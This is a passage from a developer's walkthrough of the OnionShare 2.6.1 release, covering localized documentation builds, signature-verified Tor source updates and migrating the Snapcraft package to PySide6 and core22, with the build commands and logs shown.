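<p>Conceptually, the build script loops over <code>LOCALES</code> and runs one Sphinx build per language. A rough Python equivalent of that loop (the output paths and exact <code>sphinx-build</code> invocation here are my assumptions, not a transcript of <code>build.sh</code>):</p>

```python
# Rough sketch of the per-locale loop a script like docs/build.sh performs:
# one sphinx-build run per enabled language. Paths are illustrative.
LOCALES = "en fr el pl es tr uk vi".split()

def build_commands(version: str = "2.6.1") -> list:
    """Construct one sphinx-build command line per enabled locale."""
    return [
        f"sphinx-build -b html -D language={loc} source build/docs/{version}/{loc}"
        for loc in LOCALES
    ]

for cmd in build_commands():
    print(cmd)
```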
<p>Finally, I build the new documentation by running this from the <code>docs</code> folder:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>./build.sh
</pre></div>
<p>This builds the static documentation website (hosted at <a href="https://docs.onionshare.org/">https://docs.onionshare.org/</a>) for version 2.6.1, and stores it in <code>docs/build/docs/2.6.1/</code>. Here's a screenshot of the documentation, viewed locally:</p>
<p><img src="onionshare-docs-english.png" alt="Documentation in English"></p>
<p>In that screenshot I had clicked the menu button in the bottom left, which shows which languages the documentation is translated into, and lets you switch. Here's a screenshot of the same documentation page, but this time in Vietnamese:</p>
<p><img src="onionshare-docs-vietnamese.png" alt="Documentation in Vietnamese"></p>
<p>I've committed all of these changes, and with that, localization for 2.6.1 is finished!</p>
<h2 id="making-sure-snapcraft-packaging-works">Making sure Snapcraft packaging works</h2><p>To make sure the Snapcraft package works, I need to switch to my computer running Ubuntu--in my case, I'm running Ubuntu 23.04.</p>
<p>To make the Snapcraft release, I need to update all of the dependencies in the Snapcraft <a href="https://github.com/onionshare/onionshare/blob/main/snap/snapcraft.yaml">YAML file</a>, <code>snap/snapcraft.yaml</code>, and then build and install a snap, to make sure it all works as expected.</p>
<h3 id="updating-dependencies">Updating dependencies</h3><p>I'll start by updating the versions of <code>tor</code>, <code>libevent</code>, <code>obfs4</code>, <code>snowflake-client</code>, and <code>meek-client</code>.</p>
<p>Here's the existing <code>tor</code> part:</p>
<div class="hll"><pre><span></span><span class="nt">tor</span><span class="p">:</span>
<span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://dist.torproject.org/tor-0.4.7.12.tar.gz</span>
<span class="w"> </span><span class="nt">source-checksum</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">sha256/3b5d969712c467851bd028f314343ef15a97ea457191e93ffa97310b05b9e395</span>
<span class="w"> </span><span class="nt">source-type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tar</span>
<span class="w"> </span><span class="nt">plugin</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">autotools</span>
<span class="w"> </span><span class="nt">autotools-configure-parameters</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="s">"--with-libevent-dir=$SNAPCRAFT_PART_INSTALL/../../libevent/install/usr/local"</span>
<span class="w"> </span><span class="nt">build-packages</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">libssl-dev</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">zlib1g-dev</span>
<span class="w"> </span><span class="nt">after</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">[</span><span class="nv">libevent</span><span class="p p-Indicator">]</span>
</pre></div>
<p>I want to upgrade to the latest version of Tor, so I'm going to <a href="https://dist.torproject.org/">https://dist.torproject.org/</a> to check what that is. At the moment, it looks like the latest release is <code>tor-0.4.8.5.tar.gz</code>. So on my computer, I'll download this file, along with its checksum and its PGP signature:</p>
<div class="hll"><pre><span></span>wget<span class="w"> </span>https://dist.torproject.org/tor-0.4.8.5.tar.gz
wget<span class="w"> </span>https://dist.torproject.org/tor-0.4.8.5.tar.gz.sha256sum
wget<span class="w"> </span>https://dist.torproject.org/tor-0.4.8.5.tar.gz.sha256sum.asc
</pre></div>
<p>I'm then verifying the checksum's signature:</p>
<pre><code>$ gpg --verify tor-0.4.8.5.tar.gz.sha256sum.asc
gpg: assuming signed data in 'tor-0.4.8.5.tar.gz.sha256sum'
gpg: Signature made Wed 30 Aug 2023 06:14:29 AM PDT
gpg: using RSA key B74417EDDF22AC9F9E90F49142E86A2A11F48D36
gpg: Good signature from "David Goulet <dgoulet@ev0ke.net>" [unknown]
gpg: aka "David Goulet <dgoulet@riseup.net>" [unknown]
gpg: aka "David Goulet <dgoulet@torproject.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: B744 17ED DF22 AC9F 9E90 F491 42E8 6A2A 11F4 8D36
gpg: Signature made Wed 30 Aug 2023 07:14:27 AM PDT
gpg: using EDDSA key 514102454D0A87DB0767A1EBBE6A0531C18A9179
gpg: Good signature from "Alexander Færøy <ahf@0x90.dk>" [unknown]
gpg: aka "Alexander Færøy <ahf@bornhack.org>" [unknown]
gpg: aka "Alexander Færøy <ahf@fsfe.org>" [unknown]
gpg: aka "Alexander Færøy <ahf@irc6.net>" [unknown]
gpg: aka "Alexander Færøy <ahf@irssi.org>" [unknown]
gpg: aka "Alexander Færøy <ahf@torproject.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 1C1B C007 A9F6 07AA 8152 C040 BEA7 B180 B149 1921
Subkey fingerprint: 5141 0245 4D0A 87DB 0767 A1EB BE6A 0531 C18A 9179
</code></pre>
<p>Then I'm making sure the SHA256 checksum matches:</p>
<pre><code>$ sha256sum --check tor-0.4.8.5.tar.gz.sha256sum
tor-0.4.8.5.tar.gz: OK
</code></pre>
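<p>As a sanity check of my sanity check, the same comparison can be reproduced in Python with <code>hashlib</code>: hash the tarball in chunks and compare against the digest recorded in the <code>.sha256sum</code> file (a generic sketch, not part of the OnionShare release scripts):</p>

```python
# Generic sketch of what `sha256sum --check` does: hash the file in chunks
# and compare against the hex digest in the .sha256sum file.
import hashlib

def sha256_of(path: str) -> str:
    """Compute the SHA256 hex digest of a file, reading it in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(tarball: str, sumfile: str) -> bool:
    """Check the tarball against the first field of the .sha256sum file."""
    with open(sumfile) as f:
        expected = f.read().split()[0]
    return sha256_of(tarball) == expected
```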
<p>It does, so now I'm updating <code>snapcraft.yaml</code> to include the new version of Tor, along with its checksum:</p>
<div class="hll"><pre><span></span><span class="nt">tor</span><span class="p">:</span>
<span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://dist.torproject.org/tor-0.4.8.5.tar.gz</span>
<span class="w"> </span><span class="nt">source-checksum</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">sha256/6957cfd14a29eee7555c52f8387a46f2ce2f5fe7dadf93547f1bc74b1657e119</span>
</pre></div>
<p>Next, I'll do something similar for <code>libevent</code>. Here's the <code>libevent</code> part:</p>
<div class="hll"><pre><span></span><span class="nt">libevent</span><span class="p">:</span>
<span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/libevent/libevent/releases/download/release-2.1.12-stable/libevent-2.1.12-stable.tar.gz</span>
<span class="w"> </span><span class="nt">source-checksum</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">sha256/92e6de1be9ec176428fd2367677e61ceffc2ee1cb119035037a27d346b0403bb</span>
<span class="w"> </span><span class="nt">source-type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tar</span>
<span class="w"> </span><span class="nt">plugin</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">autotools</span>
</pre></div>
<p>Looking at <a href="https://github.com/libevent/libevent/releases/">https://github.com/libevent/libevent/releases/</a> it seems that 2.1.12-stable is still the latest stable version, so I'll leave this part as is.</p>
<p>Next, I'll upgrade <code>obfs4</code>, <code>snowflake-client</code>, and <code>meek-client</code>. These are slightly simpler because they're pulled from git, and I just need to update the git tags--the same tags I used in the <code>desktop/scripts/build-pt-*</code> scripts. I'm leaving <code>obfs4</code> with the source tag <code>obfs4proxy-0.0.14</code>, I'm upgrading <code>snowflake-client</code> to use the source tag <code>v2.6.0</code>, and I'm upgrading <code>meek-client</code> to use the source tag <code>v0.38.0</code>.</p>
<p>I then turn my attention to the <code>onionshare</code> part. While the CLI and desktop version of OnionShare use Poetry to keep track of Python dependencies, I had issues making this work with Snapcraft, so instead I redefine those dependencies in a <code>requirements.txt</code> file. Without going into the nitty gritty details, I basically need to look at all of the dependencies in <code>cli/pyproject.toml</code> and <code>desktop/pyproject.toml</code> and make sure the <code>requirements.txt</code> file in the <code>override-pull</code> section of the <code>onionshare</code> part matches them. Here's my new <code>override-pull</code> section:</p>
<div class="hll"><pre><span></span><span class="nt">override-pull</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">snapcraftctl pull</span>
<span class="w"> </span><span class="no">rm pyproject.toml poetry.lock</span>
<span class="w"> </span><span class="no">cat > requirements.txt << EOF</span>
<span class="w"> </span><span class="no"># onionshare_cli</span>
<span class="w"> </span><span class="no">click</span>
<span class="w"> </span><span class="no">flask==2.3.2</span>
<span class="w"> </span><span class="no">flask-compress==1.13</span>
<span class="w"> </span><span class="no">flask-socketio==5.3.4</span>
<span class="w"> </span><span class="no">psutil</span>
<span class="w"> </span><span class="no">pysocks</span>
<span class="w"> </span><span class="no">requests[socks]</span>
<span class="w"> </span><span class="no">unidecode</span>
<span class="w"> </span><span class="no">urllib3</span>
<span class="w"> </span><span class="no">eventlet</span>
<span class="w"> </span><span class="no">setuptools</span>
<span class="w"> </span><span class="no">pynacl</span>
<span class="w"> </span><span class="no">colorama</span>
<span class="w"> </span><span class="no">gevent-websocket</span>
<span class="w"> </span><span class="no">stem==1.8.1</span>
<span class="w"> </span><span class="no">waitress</span>
<span class="w"> </span><span class="no">werkzeug==2.3.4</span>
<span class="w"> </span><span class="no"># onionshare</span>
<span class="w"> </span><span class="no">qrcode</span>
<span class="w"> </span><span class="no">EOF</span>
</pre></div>
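<p>To reduce the odds of the two dependency lists drifting apart, a quick consistency check helps: strip version pins and extras from the <code>requirements.txt</code>-style lines and compare the bare package names against what the <code>pyproject.toml</code> files declare. A sketch of that check, with illustrative package lists rather than the full OnionShare sets:</p>

```python
# Sketch of a requirements.txt consistency check (illustrative helper,
# not part of the OnionShare build).
import re

def package_names(requirements: str) -> set:
    """Extract bare, lowercased package names from requirements-style lines."""
    names = set()
    for line in requirements.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Cut each line at the first version pin, extras bracket, or space.
        names.add(re.split(r"[=<>\[\s]", line, maxsplit=1)[0].lower())
    return names

reqs = "flask==2.3.2\nrequests[socks]\nstem==1.8.1\n# onionshare\nqrcode"
print(sorted(package_names(reqs)))  # → ['flask', 'qrcode', 'requests', 'stem']
```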
<h3 id="trying-to-update-from-pyside2-to-pyside6">Trying to update from PySide2 to PySide6</h3><p>One of the major changes between OnionShare 2.6 and 2.6.1 is that we've upgraded <a href="https://wiki.qt.io/Qt_for_Python">Qt for Python</a> (the GUI framework that OnionShare uses) from PySide2 to PySide6. PySide2 brings Qt 5.x support to Python, and PySide6 brings Qt 6.x support. The main reason for upgrading is that we wanted to support Apple Silicon Macs: PySide2 does not publish arm64 binaries, but PySide6 does.</p>
<p>In the <code>stage-packages</code> section of the <code>onionshare</code> part, the YAML file lists Ubuntu packages that are required for the app to run, including:</p>
<ul>
<li><code>python3-pyside2.qtcore</code></li>
<li><code>python3-pyside2.qtgui</code></li>
<li><code>python3-pyside2.qtwidgets</code></li>
</ul>
<p>Can I just change these <code>pyside2</code>s to <code>pyside6</code>s? Nope. I searched <a href="https://packages.ubuntu.com/">Ubuntu packages</a> and it looks like the equivalent PySide6 packages aren't available. Okay, I will delete these <code>python3-pyside2.*</code> packages from <code>stage-packages</code>, and add <code>PySide6==6.5.2</code> to the <code>requirements.txt</code> file in the <code>override-pull</code> section, to see if that works.</p>
<p>In order to test, I need to build the snap locally. To do that, first I need to install <code>snapcraft</code> (the tool for building snaps, as opposed to <code>snap</code>, which is the tool for installing already-built snaps) on my computer:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>snap<span class="w"> </span>install<span class="w"> </span>snapcraft<span class="w"> </span>--classic
</pre></div>
<p>Then I can build it by running:</p>
<div class="hll"><pre><span></span>snapcraft
</pre></div>
<p>This takes a long time to run. It launches a new VM, downloads the source code for all of the OnionShare dependencies, compiles them all, and builds OnionShare itself. It's quicker on subsequent runs, though. Eventually, it finishes with:</p>
<pre><code>--snip--
Priming onionshare
+ snapcraftctl prime
This part is missing libraries that cannot be satisfied with any available stage-packages known to snapcraft:
- libQt6Quick3DHelpersImpl.so.6
- libQt6Quick3DSpatialAudio.so.6
- libmysqlclient.so.21
- libxcb-cursor.so.0
- libxkbfile.so.1
These dependencies can be satisfied via additional parts or content sharing. Consider validating configured filesets if this dependency was built.
Snapping |
Snapped onionshare_2.6.1_amd64.snap
</code></pre>
<p>Hmm, there's a warning that it's missing Qt6 libraries. That's probably not good.</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>The <code>base</code> of this snap is <code>core20</code>, which is based on Ubuntu 20.04 LTS. I searched Ubuntu 20.04 packages for "libqt6" and there were no results, but there are some "libqt6" packages in Ubuntu 22.04. If I can't get this to work, I might need to upgrade the snap from <code>core20</code> to <code>core22</code>, which could come with its own set of problems. Alternatively, I could try compiling Qt6 inside the snap to get the libraries, instead of installing them from the package manager.</p>
<p>Still, I'll install the snap I created and then run it to see what happens.</p>
<pre><code>$ sudo snap install ./onionshare_2.6.1_amd64.snap --devmode
onionshare 2.6.1 installed
$ /snap/bin/onionshare
Warning: Schema “org.gnome.system.locale” has path “/system/locale/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy” has path “/system/proxy/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.http” has path “/system/proxy/http/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.https” has path “/system/proxy/https/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.ftp” has path “/system/proxy/ftp/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.socks” has path “/system/proxy/socks/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Traceback (most recent call last):
File "/snap/onionshare/x3/bin/onionshare", line 5, in <module>
from onionshare import main
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare/__init__.py", line 34, in <module>
from onionshare_cli.common import Common
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare_cli/__init__.py", line 30, in <module>
from .web import Web
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare_cli/web/__init__.py", line 21, in <module>
from .web import Web
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare_cli/web/web.py", line 26, in <module>
from packaging.version import Version
ModuleNotFoundError: No module named 'packaging'
</code></pre>
<p>Okay, I'll add <code>packaging</code> to the <code>requirements.txt</code> and try again:</p>
<div class="hll"><pre><span></span>snapcraft<span class="w"> </span><span class="c1"># this takes awhile to finish</span>
sudo<span class="w"> </span>snap<span class="w"> </span>install<span class="w"> </span>./onionshare_2.6.1_amd64.snap<span class="w"> </span>--devmode
/snap/bin/onionshare
</pre></div>
<p>This time it fails with the error:</p>
<pre><code>python3: symbol lookup error: /snap/onionshare/x4/lib/python3.8/site-packages/PySide6/Qt/plugins/platforms/../../lib/libQt6WaylandClient.so.6: undefined symbol: wl_proxy_marshal_flags
</code></pre>
<p>Okay yeah, I expected that it wouldn't work. I'm going to need to get Qt6 installed in this snap.</p>
<h3 id="updating-from-core20-to-core22">Updating from <code>core20</code> to <code>core22</code></h3><p><em>🎵 Debugging noises continue... 🎵</em></p>
<p>In order to install the Qt6 libraries from Ubuntu packages, I'm going to upgrade this snap to use <code>core22</code>, since Ubuntu 22.04 has Qt6 packages with names like <code>libqt6core6</code> and <code>libqt6gui6</code>.</p>
<p>While I'm performing this upgrade, I'll be following this <a href="https://forum.snapcraft.io/t/micro-howto-migrate-from-core20-to-core22/30188">official guide</a> on migrating from <code>core20</code> to <code>core22</code>. Here's what I'm changing:</p>
<ul>
<li>I'm changing <code>base: core20</code> to <code>base: core22</code>.</li>
<li>In all of the parts with an <code>override-pull</code> section, I'm replacing <code>snapcraftctl pull</code> with <code>craftctl default</code>.</li>
<li>In my <code>override-build</code> sections, I'm changing the environment variable <code>$SNAPCRAFT_PART_INSTALL</code> to <code>$CRAFT_PART_INSTALL</code>.</li>
<li>The <code>onionshare</code> app uses the <code>gnome-3-38</code> extension, but I'm removing it altogether--if it's required, I can try the <code>gnome</code> extension (which supports <code>core22</code>) or the <code>kde-neon</code> extension.</li>
</ul>
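<p>The checklist above is mostly mechanical renaming, which can be expressed as a plain search-and-replace over <code>snapcraft.yaml</code> (a throwaway sketch, not a real migration tool):</p>

```python
# The core20 -> core22 renames from the migration guide, applied as plain
# text substitutions. A throwaway sketch, not an official migration tool.
RENAMES = {
    "base: core20": "base: core22",
    "snapcraftctl pull": "craftctl default",
    "$SNAPCRAFT_PART_INSTALL": "$CRAFT_PART_INSTALL",
}

def migrate(yaml_text: str) -> str:
    """Apply each core20 -> core22 rename to the YAML text."""
    for old, new in RENAMES.items():
        yaml_text = yaml_text.replace(old, new)
    return yaml_text

snippet = "base: core20\noverride-pull: |\n  snapcraftctl pull"
print(migrate(snippet))
```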
<p>After making these changes, I'm trying again:</p>
<pre><code>$ snapcraft
Traceback (most recent call last):
File "/snap/snapcraft/9542/bin/snapcraft", line 8, in <module>
sys.exit(run())
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/cli.py", line 255, in run
_run_dispatcher(dispatcher, global_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/cli.py", line 228, in _run_dispatcher
dispatcher.run()
File "/snap/snapcraft/9542/lib/python3.8/site-packages/craft_cli/dispatcher.py", line 448, in run
return self._loaded_command.run(self._parsed_command_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/commands/lifecycle.py", line 265, in run
super().run(parsed_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/commands/lifecycle.py", line 138, in run
parts_lifecycle.run(self.name, parsed_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/parts/lifecycle.py", line 216, in run
_run_command(
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/parts/lifecycle.py", line 262, in _run_command
_run_in_provider(project, command_name, parsed_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/parts/lifecycle.py", line 487, in _run_in_provider
providers.ensure_provider_is_available(provider)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/providers.py", line 148, in ensure_provider_is_available
LXDProvider.ensure_provider_is_available()
File "/snap/snapcraft/9542/lib/python3.8/site-packages/craft_providers/lxd/lxd_provider.py", line 70, in ensure_provider_is_available
ensure_lxd_is_ready()
File "/snap/snapcraft/9542/lib/python3.8/site-packages/craft_providers/lxd/installer.py", line 132, in ensure_lxd_is_ready
raise errors.LXDError(
craft_providers.lxd.errors.LXDError: LXD requires additional permissions.
Ensure that the user is in the 'lxd' group.
Visit https://linuxcontainers.org/lxd/getting-started-cli/ for instructions on installing and configuring LXD for your operating system.
</code></pre>
<p>It turns out, Snapcraft is moving away from VMs for building snaps and towards Linux containers (which honestly is way nicer--this makes it simpler to build snaps inside of VMs, without needing nested VMs). I ran into this a bit while getting snaps to build in GitHub Actions. Based on this error message, it looks like I need to add my user on my Ubuntu system to the <code>lxd</code> group. I do that by running this:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>usermod<span class="w"> </span>-a<span class="w"> </span>-G<span class="w"> </span>lxd<span class="w"> </span><span class="nv">$USER</span>
</pre></div>
<p>Next, I'm saving all my work and rebooting my Ubuntu computer. After booting back in, I tried again, and realized I had to run this command before it would work:</p>
<div class="hll"><pre><span></span>lxd<span class="w"> </span>init<span class="w"> </span>--auto
</pre></div>
<p>After that, running <code>snapcraft</code> is finally building the OnionShare snap, this time in a container instead of in a VM. Here's the output:</p>
<pre><code>$ snapcraft
Launching instance...
Executed: pull launcher
Executed: pull libevent
Executed: pull meek-client
Executed: pull obfs4
Executed: pull snowflake-client
Executed: pull tor
Executed: pull onionshare-cli
Executed: pull onionshare
Executed: build launcher
Executed: build libevent
Executed: build meek-client
Executed: build obfs4
Executed: build snowflake-client
Executed: skip pull libevent (already ran)
Executed: skip build libevent (already ran)
Executed: stage libevent (required to build 'tor')
Executed: build tor
Executed: skip pull meek-client (already ran)
Executed: skip build meek-client (already ran)
Executed: stage meek-client (required to build 'onionshare-cli')
Executed: skip pull obfs4 (already ran)
Executed: skip build obfs4 (already ran)
Executed: stage obfs4 (required to build 'onionshare-cli')
Executed: skip pull tor (already ran)
Executed: skip build tor (already ran)
Executed: stage tor (required to build 'onionshare-cli')
Executed: skip pull snowflake-client (already ran)
Executed: skip build snowflake-client (already ran)
Executed: stage snowflake-client (required to build 'onionshare-cli')
Executed: build onionshare-cli
Executed: skip pull onionshare-cli (already ran)
Executed: skip build onionshare-cli (already ran)
Executed: stage onionshare-cli (required to build 'onionshare')
Executed: build onionshare
Executed: stage launcher
Executed: skip stage libevent (already ran)
Executed: skip stage meek-client (already ran)
Executed: skip stage obfs4 (already ran)
Executed: skip stage snowflake-client (already ran)
Executed: skip stage tor (already ran)
Executed: skip stage onionshare-cli (already ran)
Executed: stage onionshare
Executed: prime launcher
Executed: prime libevent
Executed: prime meek-client
Executed: prime obfs4
Executed: prime snowflake-client
Executed: prime tor
Executed: prime onionshare-cli
Executed: prime onionshare
Executed parts lifecycle
Generated snap metadata
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtMultimedia.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtMultimediaWidgets.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtQml.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtQuick.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtSpatialAudio.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtTextToSpeech.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtWebEngineCore.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtWebEngineQuick.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtWebEngineWidgets.abi3.so'
Lint warnings:
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineCore.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineQuick.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineWidgets.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6XcbQpa.so.6: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/libexec/QtWebEngineProcess: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/designer/libqwebengineview.so: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstallocators-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstapp-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstaudio-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstbase-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstgl-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstpbutils-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstreamer-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstvideo-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/platforms/libqxcb.so: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/sqldrivers/libqsqlmysql.so: missing dependency 'libmysqlclient.so.21'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/xcbglintegrations/libqxcb-egl-integration.so: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/xcbglintegrations/libqxcb-glx-integration.so: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/Helpers/impl/libqtquick3dhelpersimplplugin.so: missing dependency 'libQt6Quick3DHelpersImpl.so.6'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/SpatialAudio/libquick3dspatialaudioplugin.so: missing dependency 'libQt6Quick3DSpatialAudio.so.6'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtWebEngine/libqtwebenginequickplugin.so: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: libQt6MultimediaWidgets.so.6: unused library 'lib/python3.10/site-packages/PySide6/Qt/lib/libQt6MultimediaWidgets.so.6'. (https://snapcraft.io/docs/linters-library)
- library: libQt6Quick3DGlslParser.so.6: unused library 'lib/python3.10/site-packages/PySide6/Qt/lib/libQt6Quick3DGlslParser.so.6'. (https://snapcraft.io/docs/linters-library)
- library: libQt6Quick3DIblBaker.so.6: unused library 'lib/python3.10/site-packages/PySide6/Qt/lib/libQt6Quick3DIblBaker.so.6'. (https://snapcraft.io/docs/linters-library)
- library: libEGL_mesa.so.0: unused library 'usr/lib/x86_64-linux-gnu/libEGL_mesa.so.0.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libGLX_mesa.so.0: unused library 'usr/lib/x86_64-linux-gnu/libGLX_mesa.so.0.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libcolordprivate.so.2: unused library 'usr/lib/x86_64-linux-gnu/libcolordprivate.so.2.0.5'. (https://snapcraft.io/docs/linters-library)
- library: libdconf.so.1: unused library 'usr/lib/x86_64-linux-gnu/libdconf.so.1.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libexslt.so.0: unused library 'usr/lib/x86_64-linux-gnu/libexslt.so.0.8.20'. (https://snapcraft.io/docs/linters-library)
- library: libgdk_pixbuf_xlib-2.0.so.0: unused library 'usr/lib/x86_64-linux-gnu/libgdk_pixbuf_xlib-2.0.so.0.4000.2'. (https://snapcraft.io/docs/linters-library)
- library: libicuio.so.70: unused library 'usr/lib/x86_64-linux-gnu/libicuio.so.70.1'. (https://snapcraft.io/docs/linters-library)
- library: libicutest.so.70: unused library 'usr/lib/x86_64-linux-gnu/libicutest.so.70.1'. (https://snapcraft.io/docs/linters-library)
- library: libodbccr.so.2: unused library 'usr/lib/x86_64-linux-gnu/libodbccr.so.2.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libpulse-mainloop-glib.so.0: unused library 'usr/lib/x86_64-linux-gnu/libpulse-mainloop-glib.so.0.0.6'. (https://snapcraft.io/docs/linters-library)
- library: libpulse-simple.so.0: unused library 'usr/lib/x86_64-linux-gnu/libpulse-simple.so.0.1.1'. (https://snapcraft.io/docs/linters-library)
- library: librsvg-2.so.2: unused library 'usr/lib/x86_64-linux-gnu/librsvg-2.so.2.48.0'. (https://snapcraft.io/docs/linters-library)
- library: libssl3.so: unused library 'usr/lib/x86_64-linux-gnu/libssl3.so'. (https://snapcraft.io/docs/linters-library)
- library: libevent_core-2.1.so.7: unused library 'usr/local/lib/libevent_core-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
- library: libevent_extra-2.1.so.7: unused library 'usr/local/lib/libevent_extra-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
